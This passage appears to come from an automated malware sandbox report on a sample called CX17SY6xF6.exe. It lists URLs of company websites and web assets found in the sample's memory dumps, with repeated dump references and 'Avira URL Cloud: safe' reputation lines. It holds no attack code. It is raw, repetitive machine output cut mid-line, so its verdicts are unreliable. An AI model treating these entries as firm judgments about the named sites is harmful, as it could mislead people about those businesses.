                                                                                                                                                                                                                          http://hotel-amadeus-frankfurt.de/fonts/DejaVu-Sans/stylesheet.cssCX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.639995551.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          https://www.stajerskagz.si/o-sgz-2/CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          https://www.com-sit.com/usa/CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            http://hotel-amadeus-frankfurt.de/js/form.class.jsCX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.639995551.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            http://www.c9dd.com/C#i((CX17SY6xF6.exe, 00000000.00000003.699451551.00000000071CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/merilni-pretvornikCX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            http://www.elpro.si/wp-content/themes/elpro/js/functions.js?ver=1.0.0CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            https://www.elpro.si/wp-content/uploads/2020/03/ICO-75-Monitoring.svgCX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            https://www.elpro.si/kategorija-izdelka/wika-partner/kalibracija/CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            https://oss.maxcdn.com/respond/1.4.2/respond.min.jsCX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://www.elpro.si/wp-content/uploads/2023/07/PRENOSNA_2220-9670-asfalt_asvalt_moder-150x150.jpgCX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wcCX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://pohlfood.com/#websiteCX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://www.pcgrate.com/#webpageCX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://inhouse.pohlfood.com/CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://www.elpro.si/wp-content/uploads/2020/03/ICO-75-Prenosne-naprave.svgCX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://www.elpro.si/kategorija-izdelka/rotronic/temperatura-rotronic-merilniki-temperature/CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/manometri-z-izhodnim-signalom/CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://pohlfood.com/wp-content/plugins/ooohboi-steroids-for-elementor/assets/css/main.css?ver=2.1.50CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/prikazovalnik-toka-jola/CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/regulacija-nivoja/meritevCX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://www.elpro.si/wp-content/uploads/2023/06/Untitled-design-64x36.jpgCX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://www.myropcb.com/wp-content/themes/thematic/library/scripts/supersubs.jsCX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://gpthink.com/product/204.htmlCX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 